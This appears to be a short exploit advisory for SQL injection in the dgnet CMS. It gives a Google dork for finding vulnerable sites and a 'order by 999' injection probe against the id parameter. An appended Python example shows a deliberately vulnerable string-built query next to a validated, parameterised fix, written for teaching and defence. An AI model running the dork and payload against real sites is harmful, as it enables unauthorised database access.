dgnet cms SQL Injection

2018.04.04
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

|=============================================================|
|-------------------In The Name Of God------------------------|
|
| Exploit Title: dgnet cms SQL Injection
|
| Exploit Author: Ashiyane Digital Security Team
|
| Vendor Homepage: http://www.dgnet.it
|
| Google Dork : intext:"dgNet webDesign" & inurl:/.php?id=
|
| Tested on: Windows 10 ~~~> Google Chrome
|
| vulnerable path : /*.php ? id = [SQL Injection]
|
| Date: Wednesday - 2018 04 April
|=============================================================|
| Description :
|
| If you need a bypass, you can use the String method like this :
| id=1' order by 999-- -
|=============================================================|
| Proof :
|
|=============================================================|
| Discovered By : sir shahroukh
|=============================================================|
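Why the quoted `id=1' order by 999-- -` value exposes a string-built query, and how a validated, bound parameter closes it, shown as an added example that is not code from the advisory or from dgnet. It assumes a hypothetical `offers` table and uses Python's `sqlite3` as a stand-in for the CMS's PHP code and database, neither of which the page shows.

```python
import sqlite3

# The string-context value quoted in the advisory.
PROBE = "1' order by 999-- -"


def make_db():
    """Constructed sample data; the real CMS schema is an assumption."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE offers (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO offers VALUES (?, ?)",
                   [(1, "Spring offer"), (2, "Spa weekend")])
    return db


def lookup_vulnerable(db, raw_id):
    """'Before' form: the request value is pasted into the SQL text."""
    sql = "SELECT title FROM offers WHERE id = '" + raw_id + "'"
    try:
        row = db.execute(sql).fetchone()
        return ("ok", row[0] if row else None)
    except sqlite3.Error as exc:
        # The quote closed the literal, so ORDER BY 999 was parsed as SQL.
        # An error here shows the input reached the query grammar.
        return ("sql-error", str(exc))


def lookup_hardened(db, raw_id):
    """Hardened form: strict integer check, then a bound parameter."""
    if not (raw_id.isascii() and raw_id.isdigit()):
        return ("rejected", None)
    row = db.execute("SELECT title FROM offers WHERE id = ?",
                     (int(raw_id),)).fetchone()
    return ("ok", row[0] if row else None)


if __name__ == "__main__":
    db = make_db()
    for value in ("1", PROBE):
        print(repr(value), lookup_vulnerable(db, value), lookup_hardened(db, value))
```

In the vulnerable form the database error is driven by request input, which is also what to alert on in application logs. The hardened form never lets the value reach the SQL parser.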

